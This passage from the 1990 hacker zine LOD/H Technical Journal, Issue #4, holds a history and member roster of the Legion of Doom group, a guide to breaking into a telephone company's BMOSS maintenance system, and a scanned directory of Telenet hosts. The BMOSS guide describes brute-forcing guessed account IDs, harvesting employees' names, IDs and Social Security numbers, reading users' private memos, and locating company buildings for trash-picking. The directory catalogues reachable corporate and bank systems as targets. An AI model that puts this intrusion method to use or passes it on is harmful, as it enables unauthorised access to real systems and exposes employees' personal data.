|||
|
drawback of becoming a BBS hermit is how the rumors start to accrue as time
|
|||
|
progresses. I have been "busted" perhaps a hundred times if you believe every
|
|||
|
rumor. The fact is that I have never been visited let alone busted. I have
|
|||
|
seen many people get into trouble due to their own carelessness. Those who
|
|||
|
have remained unmolested by the authorities are either very careful and
|
|||
|
paranoid, or are helping them catch others. I have been extremely careful and
|
|||
|
exceedingly paranoid, period.
|
|||
|
|
|||
|
Now that I have harassed the reader with my comments regarding the whole
|
|||
|
hacking/phreaking experience, I present the story. Please note that I realize
|
|||
|
many people could care less about all this, and if you are in that category
|
|||
|
you can always throw this into the shredder, now. But, there is a sufficient
|
|||
|
number of people who actually are curious to get the real story on this stuff
|
|||
|
so here it is, presented to correct the many inaccuracies which have surfaced
|
|||
|
over the years and also for the sake of posterity.
|
|||
|
|
|||
|
_____________________________________________________________________________
|
|||
|
|
|||
|
During the winter break from school in late 1983, I took a trip up to Long
|
|||
|
Island, NY to visit Quasi Moto. I had met him in south Florida, and he had
|
|||
|
since moved. He decided to put up a BBS, and while visiting him, we worked on
|
|||
|
it. For those who do not remember, its name was PLOVERNET. PLOVERNET was
|
|||
|
considered a resurrected OSUNY by some since some users migrated to PLOVERNET
|
|||
|
after OSUNY went down, at least in part, by an article in Newsweek mentioning
|
|||
|
it. A new hacker magazine, 2600, started posting advertisements on various
|
|||
|
boards. I had been in contact with Emmanuel Goldstein, the editor of 2600, on
|
|||
|
Pirates Cove, another 516 BBS. I gave him the number to PLOVERNET and due to
|
|||
|
the large amount of users, (500, of which 70% were relatively active) 2600 had
|
|||
|
plenty of response. PLOVERNET went online in January of 1984 and shortly
|
|||
|
thereafter it was the busiest BBS around. It was so busy in fact, that a long
|
|||
|
distance service called LDX had stopped connecting people who dialed
|
|||
|
516-935-2481 which was PLOVERNET's number. Now remember, this is early 1984
|
|||
|
here. The practice of blocking calls to a certain number wasn't really done
|
|||
|
by common carriers until 1986/87 with the emergence of new security software
|
|||
|
and audit trail information. I picked the best phreaks and hackers from
|
|||
|
PLOVERNET and invited them onto the newly created LOD BBS. LOD was one of the
|
|||
|
first boards which upon connection did nothing until you entered the primary
|
|||
|
password, and there was no new user routine as the board was invitation only.
|
|||
|
Again, this was back in early 1984. It was a fairly original albeit paranoid
|
|||
|
practice at the time, and many boards subsequently adopted the technique as
|
|||
|
security became an increasing concern.
|
|||
|
|
|||
|
Various groups had started forming such as Fargo 4A and Knights of Shadow.
|
|||
|
I was admitted into Knights of Shadow in early 84. After suggesting some
|
|||
|
promising new phreaks/hacks for membership and being turned down because they
|
|||
|
were not well known enough, (ie: they weren't big names even though they knew
|
|||
|
more than the guys who supposedly were) I put up the Legion Of Doom! bulletin
|
|||
|
board and shortly thereafter started a phreak/hack group of the same name.
|
|||
|
This was about May of 84 from what my records show. I had been a member of
|
|||
|
KOS and LOD or a brief time and then KOS broke up. Although there were many
|
|||
|
users on the LOD bbs, VERY FEW WERE MEMBERS OF THE GROUP! This distinction
|
|||
|
seems to have been forgotten by many, since some who were on the BBS have
|
|||
|
claimed to have been in the group, which is not true.
|
|||
|
|
|||
|
The name Legion Of Doom! obviously came from the cartoon series which
|
|||
|
pitted them against The Superfriends. I suppose other group names have
|
|||
|
come from stranger sources. My handle, Lex Luthor was taken from the
|
|||
|
movie Superman I. In the cartoon series, LOD is led by Lex Luthor and
|
|||
|
thus, the group name was rather fitting. Being young and naive, I thought
|
|||
|
having a handle of someone who claimed to have 'the greatest criminal mind on
|
|||
|
Earth' and leading a group of the world's most notorious criminals would be
|
|||
|
cool. That was about 7-8 years ago. Now however, I see that there is nothing
|
|||
|
cool or attractive about being a criminal (believe it, or not).
|
|||
|
|
|||
|
The original group consisted of phreaks who I had thought were very good
|
|||
|
but were not considered 'famous' like those in KOS. Those original members
|
|||
|
later became some of the best known phreak personalities and contributed
|
|||
|
substantially to the knowledge of new and old phreaks alike. A list of members
|
|||
|
from the very beginning to the present follows. Through my records and from
|
|||
|
the best of my recollection I have approximated dates of entrance and exit and
|
|||
|
other information. Also, I believe I have a complete list however, there
|
|||
|
could be a mistake or two. Very few if any, handles from the past have been
|
|||
|
duplicated by 'impostors' whether knowingly or unknowingly.
|
|||
|
|
|||
|
I look at this article as a historical document seeing how no other group
|
|||
|
has survived as long as LOD has. LOD originally consisted mainly of phreaks,
|
|||
|
but had split into two separate entities. LOD for telecommunications
|
|||
|
hobbyists, and LOH for hacking and security enthusiasts.
|
|||
|
|
|||
|
Handle Entered Exit Location Reason for leaving
|
|||
|
-----------------------------------------------------------------------------
|
|||
|
Lex Luthor early 84 CURRENT Here/There ---CURRENT MEMBER---
|
|||
|
Karl Marx early 84 late 85 Colorado Went underground/quit.
|
|||
|
Mark Tabas early 84 late 85 Colorado Many reasons.
|
|||
|
Agrajag The Prolonged early 84 late 85 California Loss of interest.
|
|||
|
King Blotto early 84 late 85 Ohio No time/college.
|
|||
|
Blue Archer early 84 Fall 87 Texas College.
|
|||
|
The Dragyn early 84 late 86 Minnesota No time/lost interest.
|
|||
|
|
|||
|
Unknown Soldier mid 84 early 85 Florida Busted- Toll fraud.
|
|||
|
Sharp Razor late 84 early 86 New Jersey Busted- Abusing CIS.
|
|||
|
Doctor Who late 84 early 86 Mass. Misc. Trouble
|
|||
|
Lord Havok late 84 CURRENT Here/There ---CURRENT MEMBER---
|
|||
|
Sir Francis Drake late 84 early 86 California ???
|
|||
|
Paul Muad'dib late 84 early 86 New York Went underground/quit.
|
|||
|
Phucked Agent 04 late 84 late 87 California No time. School.
|
|||
|
X-man late 84 mid 85 New York Busted- Blue boxing.
|
|||
|
Randy Smith late 84 mid 85 Texas ???
|
|||
|
|
|||
|
Steve Dahl early 85 early 86 Illinois Busted-Carding.
|
|||
|
The Warlock early 85 early 86 Florida Lost interest.
|
|||
|
Terminal Man early 85 late 85 Mass. Kicked out-malicious hacking
|
|||
|
|
|||
|
Silver Spy late 86 Fall 87 Mass. College.
|
|||
|
The Videosmith early 86 Fall 87 Penn. Lost interest.
|
|||
|
Kerrang Khan early 86 Fall 87 U.K. ???
|
|||
|
The Marauder early 86 mid 88 Conn. Lost interest.
|
|||
|
Gary Seven early 86 mid 88 Florida Lost interest.
|
|||
|
Bill From RNOC early 87 late 87 New York Misc. Trouble.
|
|||
|
|
|||
|
Carrier Culprit mid 87 mid 88 Penn. Lost interest.
|
|||
|
Master of Impact mid 87 mid 88 California School.
|
|||
|
The Leftist mid 87 Sum 89 Georgia Misc. Trouble.
|
|||
|
Phantom Phreaker mid 87 Fall 89 Here/There Lost interest.
|
|||
|
Doom Prophet mid 87 Fall 89 Here/There Lost interest.
|
|||
|
|
|||
|
Thomas Covenant early 88 early 89 New York Misc. Trouble.
|
|||
|
The Mentor mid 88 Sum 89 Here/There Lost interest.
|
|||
|
The Urvile mid 88 Sum 89 Georgia Misc. Trouble.
|
|||
|
Phase Jitter mid 88 CURRENT Here/There ---CURRENT MEMBER---
|
|||
|
Prime Suspect mid 88 CURRENT Here/There ---CURRENT MEMBER---
|
|||
|
The Prophet late 88 Sum 89 Georgia Misc. Trouble.
|
|||
|
Skinny Puppy late 88 CURRENT Here/There ---CURRENT MEMBER----
|
|||
|
Professor Falken late 89 CURRENT Here/There ---CURRENT MEMBER---
|
|||
|
|
|||
|
|
|||
|
Directory key:
|
|||
|
"Lost Interest": simply means they lost interest in phreaking/hacking in
|
|||
|
general, not lost interest in LOD/H.
|
|||
|
"???": reason for leaving is unknown.
|
|||
|
Misc. Trouble: Exactly that. Too much to go into here.
|
|||
|
Of all 38 members, only one was forcefully ejected. It was found out that
|
|||
|
Terminal Man destroyed data that was not related to covering his tracks. This
|
|||
|
has always been unacceptable to us, regardless of what the media and law
|
|||
|
enforcement tries to get you to think.
|
|||
|
Remember, people's entrance/exit times have been estimated.
|
|||
|
|
|||
|
|
|||
|
[ End of Article ]
|
|||
|
The LOD/H Technical Journal, Issue #4: File 07 of 10
|
|||
|
|
|||
|
The Trasher's Handbook to B.M.O.S.S.
|
|||
|
by
|
|||
|
Spherical Aberration
|
|||
|
|
|||
|
INTRODUCTION:
|
|||
|
|
|||
|
Those who have actually trashed at Bell Co. before know that finding an
|
|||
|
installation can be a pain. Most Telco buildings these days are un-marked,
|
|||
|
plain, and generally overlooked by the average person. The buildings
|
|||
|
were specifically made so that they WOULD be overlooked, concealing
|
|||
|
itself and its contents. Knowing where all Bell Co. installations are
|
|||
|
would be nice, and through the help of BMOSS we can find out where they
|
|||
|
ALL are.
|
|||
|
|
|||
|
NOTE: It is possible to get locations from your city hall, just take a
|
|||
|
look at what property Bell Co. owns and locate it. However, there are few
|
|||
|
catches to this method. First, most cities charge you to find out who
|
|||
|
owns what property and there might be a waiting period of a few days.
|
|||
|
Second, not all Bell Co. property is owned by Bell Co. There are
|
|||
|
instances of Bell Co. renting a piece of property from a company and
|
|||
|
using the existing building, possibly with the leasing companies logo
|
|||
|
still on it.
|
|||
|
|
|||
|
BMOSS stands for Building Maintenance Operations Service System.
|
|||
|
BMOSS provides computer support for daily building maintenance tasks.
|
|||
|
A comprehensive database helps users keep track of repair activities.
|
|||
|
Telco field mechanics logon everyday to do assorted field mechanic
|
|||
|
stuff. From BMOSS they can check on tasks needed to be done, send
|
|||
|
messages to users, charge various Telco installations for work, log time
|
|||
|
sheets, generate purchase orders, see where his buddies are eating lunch etc.
|
|||
|
|
|||
|
BMOSSes are usually located in a BOCC (Building Operations Control
|
|||
|
Center) or in a REOC (Real Estate Operations Center). BMOSS is run
|
|||
|
under AT&T Unix System V and at some points is quite Unix-like. At each
|
|||
|
center is one PDP-11/44 or a PDP-11/84 mainframe that is the base of
|
|||
|
operations for that center and other installations supported by that
|
|||
|
BOCC/REOC.
|
|||
|
|
|||
|
LOGGING ONTO BMOSS:
|
|||
|
|
|||
|
Before logging on to BMOSS you must select the proper type of
|
|||
|
terminal emulation. BMOSS has 4 types of emulations available for all
|
|||
|
users. Users within the BOCC/REOC use either VT100 or VT220 compatible
|
|||
|
terminals, while other internal stations will use an LA120 printer
|
|||
|
terminal. Field Mechanics at a remote location use their typewriter
|
|||
|
like LA12 printer terminals.
|
|||
|
|
|||
|
Identifying a BMOSS dialup is not that hard at all. After hitting a
|
|||
|
three [CR]'s the system will respond with something like this:
|
|||
|
|
|||
|
(BEEP!)
|
|||
|
|
|||
|
Good Morning (Depending on what time of day it is)
|
|||
|
|
|||
|
BASE/OE - Fri 04/23/90 09:43:22 - Online 9
|
|||
|
|
|||
|
User ID?
|
|||
|
Password?
|
|||
|
|
|||
|
Typically user IDs are the three initials of the field mechanics name.
|
|||
|
After inputting your ID you will be prompted with a Password? request.
|
|||
|
Passwords can be from 6 to 8 characters in length, including punctuation
|
|||
|
marks, the first letter must begin with an alphabet-letter or a number.
|
|||
|
They cannot contain spaces or the users first/middle/last name.
|
|||
|
Periodically the system will prompt the user for a new password. This
|
|||
|
period of time is usually set by the system administrator.
|
|||
|
|
|||
|
I have found that the "WRK:A10" user ID or a variation of WRK:xxx
|
|||
|
where xxx is a alpha-numerical combination has worked excellent for me.
|
|||
|
I believe the WRK:xxx is some type of low-level account when field
|
|||
|
mechanics lose their current ID/PW combination. Initials also have been
|
|||
|
found on most of the systems, so a WRK:xxx and Initials brute-force attempt
|
|||
|
just may give you a working ID.
|
|||
|
|
|||
|
|
|||
|
IN BMOSS:
|
|||
|
|
|||
|
Once penetrating initial security you are then prompted with BMOSS's
|
|||
|
FLD> main level identifier. This FLD> changes as you move from BMOSS's
|
|||
|
root to the various main BMOSS branches.
|
|||
|
|
|||
|
Sometimes when you logon to BMOSS you will receive a memo saying,
|
|||
|
"NOTE - Check your office" at this time go to the Office and read the memos
|
|||
|
sent to you. Read THE OFFICE later in this article to learn how.
|
|||
|
|
|||
|
BMOSS was designed with the average Joe in mind and is very logically
|
|||
|
laid out. BMOSS was modeled after UNIX's Tree-oriented structure.
|
|||
|
Here is a Tree of BMOSS's structure:
|
|||
|
|
|||
|
BMOSS
|
|||
|
_____________|_____________
|
|||
|
| | | | | |
|
|||
|
CON DAT ACT FOR BIL OFF
|
|||
|
|
|||
|
Main Branches:
|
|||
|
CON- Control Functions (Sys Admin payroll/timesheet functions)
|
|||
|
DAT- Database Maintenance (What we are mainly concerned with)
|
|||
|
ACT- Field Activity (Handles field activities)
|
|||
|
FOR- Force Administration (Recording labor hrs for time sheets etc.)
|
|||
|
BIL- Bill Paying (Processing purchase orders, producing expense accts.)
|
|||
|
OFF- Electronic Office (Receive/Send Messages or Page users)
|
|||
|
|
|||
|
Each main branch then branches off into its own specific
|
|||
|
commands. I will concentrate on the Database Maintenance functions since
|
|||
|
the other functions have little or no use to us.
|
|||
|
|
|||
|
DATABASE MAINTENANCE:
|
|||
|
|
|||
|
To haul in the mother lode you go into the Database Maintenance area
|
|||
|
from the root. This is accomplished by typing DAT in at the FLD>
|
|||
|
prompt. Now you should get a DAT> prompt meaning you are now in the
|
|||
|
Database Maintenance section. To get a listing of the available DAT
|
|||
|
commands type in 'SHO' which is short for SHOW. We are mainly concerned
|
|||
|
with the BLD (Building Master) function. Once the BLD function is
|
|||
|
selected you will be prompted for a sub-form. There are 7 sub-forms for
|
|||
|
the BLD function.
|
|||
|
|
|||
|
BLD Sub-Forms:
|
|||
|
1. GEN- General Background
|
|||
|
2. OWN- Building Ownership (used for adding a new building to database)
|
|||
|
3. LES- Lease Terms (used for adding a new building to database)
|
|||
|
4. EMG- Emergency Data (contains Police and Fire Dept. that serve this
|
|||
|
location and their respective telephone numbers, and whether the
|
|||
|
location has backup power and fire-sprinklers etc.)
|
|||
|
5. RES- Maintenance Responsibility (Maintenance entries for building)
|
|||
|
6. WRD- Building Warden (Building Wardens number etc.)
|
|||
|
7. NOT- General Notes (Notes about the particular building)
|
|||
|
8. ACC- Accounting Distribution (Account for particular building)
|
|||
|
|
|||
|
Accessing the above information is as easy as selection of the three
|
|||
|
letter identifier at the Sub-Form prompt. We are particularly concerned
|
|||
|
with the GEN (General Background) information. This function gives us the
|
|||
|
following data:
|
|||
|
|
|||
|
1. Building's Number
|
|||
|
2. Building's Complete Address
|
|||
|
3. Building's Name
|
|||
|
4. Building's Sector (Bell informational purposes only)
|
|||
|
5. Building's Zone (Bell informational purposes only)
|
|||
|
6. Whether or not Bell owns the building. (A Y/N combination is usually
|
|||
|
shown here. Y meaning its is owned by Bellco, N meaning its not
|
|||
|
owned by Bellco.)
|
|||
|
7. The building's group (One letter identifier)
|
|||
|
8. The building's use. (Garage/Warehouse/Office etc.)
|
|||
|
9. The kind of telephone equipment used in the building. (ESS1A etc.)
|
|||
|
10. Whether or not Bell is Sub-leasing parts of the building. (Y/N identifier)
|
|||
|
11. The number of floors in the building
|
|||
|
12. The number of basements in the building (A number of 3 here would
|
|||
|
mean the building has 3 below ground level floors.
|
|||
|
13. Whether or not the building has a cable vault. (Y/N identifier)
|
|||
|
14. Gross Square footage of the building
|
|||
|
15. The number of reserved parking spaces for the building.
|
|||
|
|
|||
|
Once entering the DAT section and entering GEN as your sub-form
|
|||
|
selection you will be prompted for a building number. Random selection
|
|||
|
of building numbers is necessary because they vary from area to area.
|
|||
|
Once a legitimate building number is accessed the above information will
|
|||
|
be displayed.
|
|||
|
|
|||
|
Ok, you now have the information you need, how do you get back to a
|
|||
|
previous directory or even log off ? That's quite easy. Typing in EXI
|
|||
|
(short for EXIT) will bring you back up to the root FLD> one directory at
|
|||
|
a time. For logging off the system you should hit EXI until you reach the
|
|||
|
FLD> root then BYE and you will get:
|
|||
|
|
|||
|
BASE/OE - Fri 4/23/90 10:22:13 - Offline 9
|
|||
|
|
|||
|
Have a Good Morning
|
|||
|
|
|||
|
OTHER FUNCTIONS:
|
|||
|
|
|||
|
I have found the REPORTS function most helpful in finding other
|
|||
|
user IDs. To get a listing of the 20+ different types reports type
|
|||
|
'HELP REPORT' at the FLD> prompt. We are particularly concerned with
|
|||
|
REPORT 41, the Estimated vs. Actual Hours Log. We bring this up by
|
|||
|
typing from the FLD:
|
|||
|
|
|||
|
FLD> REPORT 41 04/02/90-04/06/90 <cr>
|
|||
|
|
|||
|
You are inquiring for the estimated vs. actual hours time on a series
|
|||
|
of jobs from April 4th 1990 through April 6th 1990. The output then
|
|||
|
kicks out the hours and such. Every field mechanic that worked throughout
|
|||
|
those days will be displayed in- First name, Middle Initial, and Last Name
|
|||
|
totally spelled out for you.
|
|||
|
|
|||
|
Another useful report is REPORT 90- Data Access Log. It is called up
|
|||
|
by typing:
|
|||
|
|
|||
|
FLD> REPORT 90 <cr>
|
|||
|
Date Range? 04/06/90-04/08/90
|
|||
|
|
|||
|
The system then kicks out all users that used the SCOPE command on
|
|||
|
other users. The system prints out the users full name and actual USER ID
|
|||
|
and who the user scoped including the scoped-user's Social Security number.
|
|||
|
|
|||
|
THE OFFICE:
|
|||
|
|
|||
|
When you are prompted that you should check your messages you should
|
|||
|
do so immediately before any work is done in BMOSS. First you must go to
|
|||
|
your office which is done by selecting OFF from the FLD> identifier.
|
|||
|
Once this is done your FLD> prompt will change to a OFF> prompt. Typing
|
|||
|
HELP will give you the available HELP commands for the office.
|
|||
|
|
|||
|
To check the messages type in:
|
|||
|
|
|||
|
OFF> STATUS <cr>
|
|||
|
|
|||
|
BMOSS will reply with the following: (example)
|
|||
|
|
|||
|
Memo From User Subject Status
|
|||
|
-------------- ------------------ ---------------------- ---
|
|||
|
IPAAA 04/01/90 Wile E Coyote Current Task Info OUT
|
|||
|
BNAAA 04/02/90 Susie B Hott Last Saturday Night IN
|
|||
|
|
|||
|
The user then sees he has a memo from his boss about his current
|
|||
|
tasks and a memo from his co-worker/seductress Susie B. Hott. Fuck his
|
|||
|
boss, he wants to read what Susie has to say. So you type in:
|
|||
|
|
|||
|
OFF> PRINT BNAAA <cr>
|
|||
|
|
|||
|
|
|||
|
--- MEMO ---
|
|||
|
Date: 04/02/90
|
|||
|
Time: 08:11
|
|||
|
|
|||
|
From: Susie B Hott
|
|||
|
To: Legion Of Doom
|
|||
|
|
|||
|
Subject: Last Saturday Night
|
|||
|
|
|||
|
LOD, I really enjoyed last saturday night. We must do it again.
|
|||
|
Give me a call soon, 555-WETT.
|
|||
|
** Susie
|
|||
|
|
|||
|
|
|||
|
A useful command is a list of OFFICE users. This gives you another
|
|||
|
listing of user's Full-Name/ID combinations. Get this by typing:
|
|||
|
|
|||
|
OFF> USERS <cr>
|
|||
|
|
|||
|
It will then print out the users who are in the Electronic Office
|
|||
|
database.
|
|||
|
|
|||
|
CONCLUSION:
|
|||
|
|
|||
|
You can get HELP from anywhere just by typing HELP from the prompt.
|
|||
|
Or if you need specific information about a function type in HELP then
|
|||
|
the function name. Such as:
|
|||
|
|
|||
|
FLD> HELP REPORT (This gives you options/help on the REPORT command)
|
|||
|
|
|||
|
BMOSS can be used for a large amount of purposes for the
|
|||
|
hacker/trasher. Even though it doesn't have any really powerful
|
|||
|
commands to self-destruct the telephone company it can be used to access
|
|||
|
other building's trash, and other things that may interest you.
|
|||
|
|
|||
|
______________________
|
|||
|
( Spherical Aberration )
|
|||
|
The LOD/H Technical Journal, Issue #4: File #08 of 10
|
|||
|
|
|||
|
The Legion Of Hackers Present:
|
|||
|
Updated: Telenet Directory
|
|||
|
Part A: Addresses 201XXX to 424XXX
|
|||
|
Revision #5 Last Updated: 2/10/90
|
|||
|
(Includes Mnemonic Host Names)
|
|||
|
|
|||
|
Scanned and Written by:
|
|||
|
Erik Bloodaxe
|
|||
|
|
|||
|
INTRODUCTION:
|
|||
|
-------------
|
|||
|
|
|||
|
It has been some time since our last update. Our old list (Revision #4) has
|
|||
|
been distributed to those in the United States and internationally thanks to
|
|||
|
the widespread use of the PSS network. For this reason we are including the
|
|||
|
format for converting this 'local' address list into accessible hosts using
|
|||
|
the standard scheme for telenet when accessed from 'foreign' networks.
|
|||
|
|
|||
|
For example, the local address: 20114 is 031102010001400 using the standard
|
|||
|
format. 3110 is the DNIC (Data Network Identifier Code) for USS Telenet
|
|||
|
and the zero preceding it is needed to make it clear to the foreign
|
|||
|
network that the NUA (Network User Address) is a non-local address. Another
|
|||
|
example, the local address is 203155 would be: 031102030015500 thus: 0DNIC NPA
|
|||
|
00 XXX YY NPA is the area-code prefix (this is not necessarily an area code),
|
|||
|
XXX is the sub-address and YY is the port which is usually 00.
|
|||
|
For those unfamiliar with Telenet addressing, it generally follows the format
|
|||
|
of grouping hosts into area codes. Thus, our directory is grouped accordingly.
|
|||
|
There are 'non-standard' address prefixes which are rather obscure. These
|
|||
|
commonly are owned by the same company or organization, whereas the area code
|
|||
|
format contains hosts from many companies or organizations. The state an area
|
|||
|
code resides is also listed to give you an idea of its location.
|
|||
|
I have also included Telenet commands, mnemonic addresses, a somewhat current
|
|||
|
list of pc-pursuit dialers, and a few things to consider for the would-be
|
|||
|
Telenet scanner.
|
|||
|
|
|||
|
NOTES:
|
|||
|
|
|||
|
When accessing telenet from abroad, ignore the '$' after the address. This
|
|||
|
denotes to users of the USA that an NUI (Network User ID) is required due to
|
|||
|
the host not accepting collect charges for the connection.
|
|||
|
|
|||
|
Addresses preceded by a * refuse collect connections, but I was
|
|||
|
unable to connect with them to determine what they were.
|
|||
|
|
|||
|
Addresses that have no comments next to them either hang up upon connection,
|
|||
|
or I was unable to evoke any response from them.
|
|||
|
|
|||
|
Due to its immense size, this directory has been presented in a 'rougher' form
|
|||
|
than our previous ones. The time to make it look 'pretty' was determined to
|
|||
|
not be worth the effort.
|
|||
|
|
|||
|
|
|||
|
TELENET COMMANDS
|
|||
|
----------------
|
|||
|
|
|||
|
Most commands are listed in their four character form, however,
|
|||
|
some may be abbreviated to merely one character (ie. C & D).
|
|||
|
|
|||
|
CONN Allows user to connect to a specified host
|
|||
|
DISA ECHO
|
|||
|
DISA FLOW
|
|||
|
DISA TFLO
|
|||
|
DISC Disconnect from current host
|
|||
|
DTAPE ?
|
|||
|
ENAB ECHO
|
|||
|
ENAB FLOW
|
|||
|
ENAB TFLO
|
|||
|
FULL Full duplex
|
|||
|
HANG Hang up port
|
|||
|
HALF Half duplex
|
|||
|
MAIL Telemail service
|
|||
|
PAR Set parameters as specified
|
|||
|
PAR? Shows current parameter settings
|
|||
|
RESE Resets the node to inactive
|
|||
|
RST Sets parameters of remote host as specified
|
|||
|
RST? Shows current parameters of remote host
|
|||
|
SET Same as PAR
|
|||
|
SET? Same as PAR?
|
|||
|
STAT Shows current port
|
|||
|
TAPE ?
|
|||
|
TELE Telemail service
|
|||
|
TEST CHAR Test of all ascii characters
|
|||
|
TEST ECHO Test which echos all characters typed
|
|||
|
TEST TRIA Test which makes repeating triangle
|
|||
|
TEST VERS Shows current pad software version
|
|||
|
|
|||
|
The default command is CONN, so if an address is entered at the
|
|||
|
'@' prompt, an attempt will be made to connect to that address.
|
|||
|
|
|||
|
A connection attempt may be aborted by sending a break signal.
|
|||
|
This will put you back to the '@' prompt.
|
|||
|
|
|||
|
To return to the '@' prompt from an established connection the
|
|||
|
user must type '@' followed by carriage return.
|
|||
|
|
|||
|
Normal 300/1200 users awaken the pad with two carriage returns.
|
|||
|
2400 baud users must type '@' then carriage return.
|
|||
|
|
|||
|
To awaken the pad in the Uninet format, type: carriage return,
|
|||
|
period, then carriage return (upon initial connection).
|
|||
|
|
|||
|
To find the telenet dialup nearest your location, call 800-424-
|
|||
|
9494 at 300/1200 baud. At the '@' prompt, type 'MAIL'. Enter
|
|||
|
user name 'PHONES' with password 'PHONES'.
|
|||
|
|
|||
|
|
|||
|
TELENET DIRECTORY
|
|||
|
-----------------
|
|||
|
|
|||
|
201--NEW JERSEY--ADDRESSES SCANNED: 0-2000
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 1 PC Pursuit Dialer (1200)
|
|||
|
14 WELCOME, NAME OR #?
|
|||
|
15 " "
|
|||
|
$ 20 VM/370
|
|||
|
$ 22 PC Pursuit Dialer (2400)
|
|||
|
* 23
|
|||
|
25 WELCOME, NAME OR #?
|
|||
|
32 D&B
|
|||
|
$ 34 PRIME MWH
|
|||
|
$ 35 PRIME
|
|||
|
45 NEWSNET
|
|||
|
$ 49 VAX
|
|||
|
50 UNIX Interet
|
|||
|
$ 51 PRIME USCGB
|
|||
|
53 Colgates IICS
|
|||
|
$ 55 PRIME USCGB
|
|||
|
$ 66 PRIME SYS001
|
|||
|
67 Warner Computer Systems
|
|||
|
68 " "
|
|||
|
69 " "
|
|||
|
74 enter class
|
|||
|
83 ENTER ID:
|
|||
|
84 D&B
|
|||
|
86 D&B
|
|||
|
88 D&B
|
|||
|
89 VM/370
|
|||
|
$ 129a
|
|||
|
138 HP-3000
|
|||
|
* 140
|
|||
|
146 HP-3000
|
|||
|
149 VAX
|
|||
|
* 150
|
|||
|
156 UNIX Securities Data Company
|
|||
|
159a
|
|||
|
163 VU/TEXT
|
|||
|
164 VU/TEXT
|
|||
|
166 VM/370 New Jersey Educational Net
|
|||
|
171 >>
|
|||
|
172 >>
|
|||
|
173
|
|||
|
200 D&B
|
|||
|
201 D&B
|
|||
|
220 VAX Investment Technologies
|
|||
|
225 VAX " "
|
|||
|
$ 241
|
|||
|
242 D&B
|
|||
|
243 D&B
|
|||
|
244 D&B
|
|||
|
246 D&B
|
|||
|
249 password required
|
|||
|
* 251
|
|||
|
252 PRIME
|
|||
|
259 VAX CCMI/McGraw Hill
|
|||
|
* 260
|
|||
|
$ 301 PC Pursuit Dialer (1200)
|
|||
|
334 TINTON1
|
|||
|
* 336
|
|||
|
$ 350 Concurrent Computer Corp
|
|||
|
353 enter switch characters
|
|||
|
$ 355 Concurrent Computer Corp
|
|||
|
359 Telenet Async to 3270
|
|||
|
367
|
|||
|
* 371
|
|||
|
* 379
|
|||
|
453 Telenet Async to 3270
|
|||
|
454a Telenet Async to 3270
|
|||
|
$ 458 ENTER REQUEST
|
|||
|
$ 459 "
|
|||
|
461 VAX
|
|||
|
463a Telenet Async to 3270
|
|||
|
470 Decserver
|
|||
|
$ 472 MHP201A
|
|||
|
476 X.29 Password:
|
|||
|
477 Please enter logon cmd
|
|||
|
$ 478 MHP205A
|
|||
|
479 Please enter logon cmd
|
|||
|
520 Enter Access ID:
|
|||
|
521 Bankers Trust Online
|
|||
|
522 VAX NYBTRP
|
|||
|
* 548
|
|||
|
586 Dow Jones News Retrieval
|
|||
|
587 " "
|
|||
|
589 " "
|
|||
|
604 Lipton Network
|
|||
|
700 HP-3000
|
|||
|
702 TOPS-20 CEI
|
|||
|
722 INSCI/90
|
|||
|
730 "
|
|||
|
751 "
|
|||
|
752 "
|
|||
|
770 "
|
|||
|
792 "
|
|||
|
799
|
|||
|
830 INSCI/90
|
|||
|
841 "
|
|||
|
850
|
|||
|
870 INSCI/90
|
|||
|
890 "
|
|||
|
895 "
|
|||
|
899
|
|||
|
910 INSCI/90
|
|||
|
912 "
|
|||
|
914 "
|
|||
|
916
|
|||
|
918 INSCI/90
|
|||
|
940 "
|
|||
|
950 Bankers Trust Online
|
|||
|
951 " "
|
|||
|
952 " "
|
|||
|
953 " "
|
|||
|
954 " "
|
|||
|
955 " "
|
|||
|
956 " "
|
|||
|
957 " "
|
|||
|
958 " "
|
|||
|
959 " "
|
|||
|
999
|
|||
|
1025
|
|||
|
1051 VU/TEXT
|
|||
|
1052 "
|
|||
|
1053 "
|
|||
|
1054 "
|
|||
|
1055 "
|
|||
|
1056 "
|
|||
|
1057 "
|
|||
|
1058 "
|
|||
|
1059 "
|
|||
|
1060 "
|
|||
|
1061 "
|
|||
|
1062 "
|
|||
|
1063 "
|
|||
|
1064 "
|
|||
|
1065 "
|
|||
|
1066 "
|
|||
|
1067 "
|
|||
|
1068 "
|
|||
|
1069 "
|
|||
|
1075 "
|
|||
|
1076 "
|
|||
|
1077 "
|
|||
|
1078 "
|
|||
|
1079 "
|
|||
|
|
|||
|
|
|||
|
202--WASHINGTON D.C.--ADRESSES SCANNED: 0-800
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
10 PRIME
|
|||
|
31 VAX News Machine
|
|||
|
$ 36 Network Sign-on Failed
|
|||
|
$ 38 "
|
|||
|
$ 47 VAX
|
|||
|
* 48
|
|||
|
49 ENTER SYSTEM ID--
|
|||
|
$ 115 PC Pursuit Dialer (300)
|
|||
|
$ 116 PC Pursuit Dialer (1200)
|
|||
|
$ 117 PC Pursuit Dialer (2400)
|
|||
|
* 123
|
|||
|
132 VAX
|
|||
|
133 BA
|
|||
|
134 BA
|
|||
|
$ 138 VAX Gallaudet University
|
|||
|
$ 139 DEC-10
|
|||
|
141 PRIME Telemail
|
|||
|
142 PRIME Telemail
|
|||
|
$ 149
|
|||
|
150 VAX IDR
|
|||
|
* 151
|
|||
|
$ 154 Telenet Async to 3270
|
|||
|
$ 155a Telenet Async to 3270
|
|||
|
$ 156 VAX American Psychiatric Assn
|
|||
|
* 157
|
|||
|
161 UNIX pac
|
|||
|
162 enter user id-
|
|||
|
$ 165 HP-3000
|
|||
|
$ 166 VAX
|
|||
|
201 Host Name:
|
|||
|
202
|
|||
|
203 USER ID:
|
|||
|
214 PRIME SPA
|
|||
|
217
|
|||
|
* 224
|
|||
|
* 230
|
|||
|
232a
|
|||
|
$ 235 PRIME AMSC
|
|||
|
$ 239 PRIME AMSA
|
|||
|
* 241
|
|||
|
* 242
|
|||
|
* 243
|
|||
|
245 AOS
|
|||
|
* 253
|
|||
|
* 254
|
|||
|
255 Morgan Stanley Network
|
|||
|
* 258
|
|||
|
* 260
|
|||
|
* 265
|
|||
|
* 266
|
|||
|
* 275
|
|||
|
* 276
|
|||
|
* 277
|
|||
|
$ 278 USER ID
|
|||
|
308 PRIME
|
